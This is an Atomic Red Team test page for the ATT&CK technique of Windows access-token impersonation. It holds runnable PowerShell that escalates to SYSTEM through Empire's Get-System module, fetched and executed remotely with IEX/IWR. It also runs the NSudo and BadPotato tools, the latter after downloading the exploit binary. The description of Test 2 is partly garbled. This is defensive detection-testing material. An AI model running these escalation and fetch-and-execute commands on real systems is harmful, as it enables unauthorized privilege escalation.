T1134.001
Access Token Manipulation: Token Impersonation/Theft
Description from ATT&CK
Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
Atomic Tests
Atomic Test #1 - Named pipe client impersonation
Uses PowerShell and Empire's GetSystem module. The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Supported Platforms: windows
auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
Atomic Test #2 - 1
SeDebugPrivilege
token duplication
1 | SeDebugPrivilege |
Uses PowerShell and Empire's GetSystem module. The script uses
to obtain, duplicate and impersonate the token of a another process.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).1
SeDebugPrivilege
Supported Platforms: windows
auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
Atomic Test #3 - Launch NSudo Executable
Launches the NSudo executable for a short period of time and then exits. NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
Supported Platforms: windows
auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
nsudo_path | Path to the NSudo bat file | Path | $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe |
Attack Commands: Run with powershell!
1
2
3
4
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
Dependencies: Run with powershell!
Description: NSudo.bat must exist in the specified path #{nsudo_path}
Check Prereq Commands:
1
2
if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
5
Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
Atomic Test #4 - Bad Potato
https://github.com/BeichenDream/BadPotato Privilege escalation using named pipe connections
Supported Platforms: windows
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
Cleanup Commands:
1
2
taskkill /f /im notepad.exe
Dependencies: Run with powershell!
Description: BadPotato.exe must exist in the temp directory
Check Prereq Commands:
1
2
if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"